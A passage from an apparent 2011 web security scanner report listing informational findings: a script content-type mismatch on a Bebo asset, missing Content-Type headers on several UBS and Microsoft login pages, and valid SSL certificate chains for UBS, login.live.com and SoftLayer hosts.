Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/mootools-core-and-more-1.3.js?fp=2cf4af889cfa23415c41c8725abb6b9a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
ETag: "ANQNXRn5n1o"
Last-Modified: Mon, 07 Feb 2011 18:15:43 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 316167
Date: Wed, 06 Jul 2011 11:21:59 GMT
Connection: close
Cache-Control: max-age=315360000

/*
---
MooTools: the javascript framework

web build:
- http://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7

packager build:
- packager build Core/Core Core/Array Core/String Core/Number Core/
...[SNIP]...

26. Content type is not specified
There are 4 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


26.1. https://ebanking-us.ubs.com/safeloginu/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebanking-us.ubs.com
Path:   /safeloginu/Login

Request

GET /safeloginu/Login?handler=SAFEGetLogin&locale=en&SAFEGoto=https%3A%2F%2Febanking-us.ubs.com%2Fgepu%2FMainAction HTTP/1.1
Host: ebanking-us.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response


<!-- SAFEGetLogin.jsp -->


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title
...[SNIP]...

26.2. https://foton-ewm-de.ubs.com/safe-login/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://foton-ewm-de.ubs.com
Path:   /safe-login/Login

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-de.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response




<html>
<head>
<title>UBS Web-Login</title>
<meta pageName='login-Login'>
<meta serviceTime='0'>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/static_safe/css/redesign_login.css" type="text/css" rel="stylesheet" />
...[SNIP]...

26.3. https://foton-ewm-es.ubs.com/safe-login/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://foton-ewm-es.ubs.com
Path:   /safe-login/Login

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-es.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response




<html>
<head>
<title>Bienvenido a UBS Bank, S.A.</title>
<meta pageName='login-Login'>
<meta serviceTime='0'>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/static_safe/css/redesign_login.css" type="text/css" rel="stylesheet" />
...[SNIP]...

26.4. https://login.live.com/hiphelp.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /hiphelp.srf

Request

GET /hiphelp.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/7.5
PPServer: PPV: 30 H: BAYIDSLGN1E29 V: 0
Date: Wed, 06 Jul 2011 11:21:10 GMT
Connection: close

404 Not Found

27. SSL certificate
There are 4 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



27.1. https://clientlogin.ibb.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://clientlogin.ibb.ubs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  clientlogin.ibb.ubs.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Oct 17 19:00:00 CDT 2010
Valid to:  Thu Nov 17 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

27.2. https://login.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.live.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Oct 04 19:00:00 CDT 2010
Valid to:  Wed Oct 05 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

27.3. https://manage.softlayer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  manage.softlayer.com
Issued by:  GeoTrust Extended Validation SSL CA
Valid from:  Thu Feb 11 15:03:03 CST 2010
Valid to:  Fri Apr 13 13:40:54 CDT 2012

Certificate chain #1

Issued to:  GeoTrust Extended Validation SSL CA
Issued by:  GeoTrust Primary Certification Authority
Valid from:  Tue Nov 28 18:00:00 CST 2006
Valid to:  Mon Nov 28 17:59:59 CST 2016

Certificate chain #2

Issued to:  GeoTrust Primary Certification Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sun Nov 26 18:00:00 CST 2006
Valid to:  Tue Aug 21 11:15:00 CDT 2018

Certificate chain #3

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

27.4. https://onlineservices.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  onlineservices.ubs.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Sep 28 19:00:00 CDT 2010
Valid to:  Sun Oct 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
